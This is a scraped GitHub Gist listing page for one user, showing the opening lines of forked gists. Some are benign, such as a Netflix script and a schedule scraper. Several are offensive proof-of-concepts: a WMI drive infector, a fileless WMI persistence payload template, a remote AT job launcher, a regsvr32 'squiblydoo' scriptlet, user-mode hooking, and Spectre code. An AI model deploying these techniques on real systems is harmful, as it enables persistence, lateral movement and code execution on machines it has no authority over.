- February 19, 2016: Initial release.
GitHub Gist doesn't send notifications when people leave a comment, so shoot me an e-mail at [email protected]. I'll gladly fix it. Fuck advertising.
ohio813
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // The player | |
| var player = netflix.cadmium.objects.videoPlayer(); | |
| // Metadata about current episode -- ID and url to get frame at a specific time | |
| var episodeId = netflix.cadmium.metadata.getActiveVideo().episodeId; | |
| var imgRoot = netflix.cadmium.metadata.getActiveVideo().progressImageRoot; | |
| // Generates URL of preview image for given timestamp | |
| function getFrame(timestamp) { | |
| var t = Math.floor(timestamp/10000).toString(10); |
ohio813
/ 1_changelog.md
Created
March 18, 2016 21:37
— forked from joepie91/1_changelog.md
Remove Wired's "ad-blocker veil"
ohio813
/ vegas2015.py
Created
March 21, 2016 12:49
— forked from williballenthin/vegas2015.py
Fetch BlackHat, Defcon, and BsidesLV schedules and create a consolidated list
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| requirements: | |
| - requests | |
| - unicodecsv | |
| - beautifulsoup4 | |
| """ | |
| import re | |
| import functools | |
| from collections import namedtuple | |
| from collections import defaultdict |
ohio813
/ sample_drive_infector.ps1
Created
April 4, 2016 09:46
— forked from mattifestation/sample_drive_infector.ps1
A PoC drive infector using permanent WMI event subscriptions. I wrote this to demonstrate passing __EventFilter arguments to a CommandLineEventConsumer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'DriveChanged' | |
| Query = 'SELECT * FROM Win32_VolumeChangeEvent' | |
| QueryLanguage = 'WQL' | |
| } | |
| $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs | |
| $CommandLineConsumerArgs = @{ |
ohio813
/ WMI_persistence_template.ps1
Created
April 4, 2016 09:46
Fileless WMI persistence payload template (CommandlineEventConsumer, __IntervalTimerInstruction trigger, w/ registry payload storage)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Step #1 - Prep payload | |
| $Hive = 'HKLM' | |
| $PayloadKey = 'SOFTWARE\PayloadKey' | |
| $PayloadValue = 'PayloadValue' | |
| $TimerName = 'PayloadTrigger' | |
| $EventFilterName = 'TimerTrigger' | |
| $EventConsumerName = 'ExecuteEvilPowerShell' | |
| switch ($Hive) { | |
| 'HKLM' { $HiveVal = [UInt32] 2147483650 } |
ohio813
/ remote_at_job.ps1
Created
April 4, 2016 09:47
— forked from mattifestation/remote_at_job.ps1
Enable and launch an AT job
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This code could be used to remotely enable and launch AT jobs regardless of the fact that AT is deprecated in Win8+. | |
| $HKLM = [UInt32] 2147483650 | |
| # Check to see if EnableAt is set | |
| $Result = Invoke-CimMethod -Namespace root/default -ClassName StdRegProv -MethodName GetDWORDValue -Arguments @{ | |
| hDefKey = $HKLM | |
| sSubKeyName = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration' | |
| sValueName = 'EnableAt' | |
| } |
ohio813
/ Example_WMI_Detection_EventLogAlert.ps1
Created
April 4, 2016 09:47
— forked from mattifestation/Example_WMI_Detection_EventLogAlert.ps1
An example of how to use permanent WMI event subscriptions to log a malicious action to the event log
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Define the signature - i.e. __EventFilter | |
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'LateralMovementEvent' | |
| Query = 'SELECT * FROM MSFT_WmiProvider_ExecMethodAsyncEvent_Pre WHERE ObjectPath="Win32_Process" AND MethodName="Create"' | |
| QueryLanguage = 'WQL' | |
| } | |
| $InstanceArgs = @{ | |
| Namespace = 'root/subscription' |
ohio813
/ Backdoor-Minimalist.sct
Created
April 27, 2016 05:41
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="Empire" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); |
ohio813
/ Injectable.cpp
Created
December 21, 2017 15:00
— forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| FARPROC fpCreateProcessW; | |
| BYTE bSavedByte; | |
| // Blog Post Here: | |
| // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
| // tasklist | findstr explore.exe |
ohio813
/ spectre.c
Created
January 25, 2018 15:56
— forked from ErikAugust/spectre.c
Spectre example code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #ifdef _MSC_VER | |
| #include <intrin.h> /* for rdtscp and clflush */ | |
| #pragma optimize("gt",on) | |
| #else | |
| #include <x86intrin.h> /* for rdtscp and clflush */ | |
| #endif |
OlderNewer